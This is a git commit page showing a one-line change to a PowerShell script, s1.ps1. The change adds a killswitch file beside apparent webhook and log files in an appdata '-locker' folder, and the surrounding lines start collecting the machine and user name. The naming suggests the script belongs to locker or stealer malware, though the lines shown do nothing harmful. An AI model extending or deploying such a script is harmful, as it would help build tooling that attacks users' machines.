Update s1.ps1
This commit is contained in:
parent
41707278ca
commit
af01db9e4f
1 changed files with 1 additions and 0 deletions
|
@ -1,6 +1,7 @@
|
|||
if (![System.IO.Directory]::Exists("$env:appdata\-locker")){New-Item -ItemType Directory -Force -Path "$env:appdata\-locker"};
|
||||
echo $dc > "$env:appdata\-locker\wh.txt";
|
||||
echo $log > "$env:appdata\-locker\log.txt";
|
||||
echo $ks > "$env:appdata\-locker\killswitch.txt";
|
||||
|
||||
function s1 {
|
||||
$user = "$env:COMPUTERNAME\$env:USERNAME"
|
||||
|
|
Loading…
Reference in a new issue